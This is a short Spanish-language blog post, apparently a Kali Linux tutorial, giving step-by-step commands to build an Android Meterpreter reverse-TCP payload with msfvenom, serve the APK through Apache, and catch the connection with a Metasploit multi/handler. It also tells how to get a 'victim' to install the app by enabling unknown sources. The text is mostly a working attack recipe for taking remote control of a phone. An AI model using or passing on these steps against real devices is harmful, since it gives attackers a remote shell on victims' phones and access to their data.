En esta ocasión, vamos a hacer un
PAYLOAD para Android.
Miramos a ver qué IP tenemos:
ifconfig
generamos el payload:
msfvenom -p
android/meterpreter/reverse_tcp LHOST=192.168.1.134 LPORT=4444 R >
payload.apk
Para pasarlo a Android, voy a utilizar
el servidor apache de Kali:
cp payload.apk /var/www/
service apache2 start
Iniciamos Metasploit:
msfconsole
use exploit/multi/handler
set PAYLOAD
android/meterpreter/reverse_tcp
set LHOST 192.168.1.134
set LPORT 4444
exploit
Descargamos el archivo en nuestro
dispositivo Android:
Pinchamos para instalar
Si nos sale:
Pinchamos a Configuración
Marcamos “Orígenes Desconocidos”
Vamos a la parte de descargas:
Pulsamos Siguiente e Instalar.
La víctima lo ejecuta
Y ya tenemos la sesión de meterpreter:
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.